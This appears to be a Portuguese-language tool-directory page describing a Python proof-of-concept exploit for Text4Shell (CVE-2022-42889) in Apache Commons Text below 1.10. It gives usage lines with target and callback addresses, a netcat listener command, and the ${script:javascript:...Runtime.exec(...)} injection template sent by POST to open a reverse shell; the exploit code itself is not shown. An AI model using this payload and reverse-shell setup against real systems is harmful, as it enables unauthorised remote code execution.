Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
text4shell-exploit — Um exploit de prova de conceito (PoC) personalizado baseado em Python visando o Text4Shell (CVE-2022-42889), uma vulnerabilidade crítica de execução remota de código nas versões do Apache Commons Text < 1.10. | Kitploit
Ferramentas/GitHubGitHub/syndicate27/text4shell-exploit
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubsyndicate27/text4shell-exploit

text4shell-exploit

Um exploit de prova de conceito (PoC) personalizado baseado em Python visando o Text4Shell (CVE-2022-42889), uma vulnerabilidade crítica de execução remota de código nas versões do Apache Commons Text < 1.10.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
11há 1 anoAinda não revisado
Compartilhar

text4shell-exploit

Um exploit de prova de conceito (PoC) personalizado em Python direcionado ao Text4Shell (CVE-2022-42889), uma vulnerabilidade crítica de execução remota de código no Apache Commons Text versões < 1.10. Este exploit tem como alvo aplicações Java vulneráveis que utilizam a classe StringSubstitutor com interpolação ativada, permitindo a injeção de expressões ${script:...} para executar comandos arbitrários no sistema.

Neste PoC, a exploração é demonstrada através do parâmetro de consulta data; no entanto, o nome do parâmetro vulnerável pode variar dependendo da implementação. Os utilizadores devem adaptar o payload e o caminho da requisição de acordo com a lógica da aplicação alvo.

Aviso Legal: Este exploit é fornecido apenas para fins educacionais e de teste de penetração autorizado. Use com responsabilidade e por sua própria conta e risco.

Descrição

Este é um exploit personalizado em Python3 para a vulnerabilidade do Apache Commons Text conhecida como Text4Shell (CVE-2022-42889). Ele permite Execução Remota de Código (RCE) através de interpoladores inseguros quando a entrada do usuário é avaliada dinamicamente por StringSubstitutor.

Testado contra:

  • Apache Commons Text < 1.10.0
  • Aplicações Java utilizando interpolação ${script:...} a partir de entrada não confiável

Uso

root@kitploit:~
python3 text4shell.py <target_ip> <callback_ip> <callback_port>

Exemplo

root@kitploit:~
python3 text4shell.py 127.0.0.1 192.168.1.2 4444

Certifique-se de configurar um lsitener na sua máquina atacante:

root@kitploit:~
nc -nlvp 4444

Lógica do Payload

O script injeta:

root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec(...)}

O reverse shell é enviado através do parâmetro /data usando uma requisição POST.

Baixar ferramenta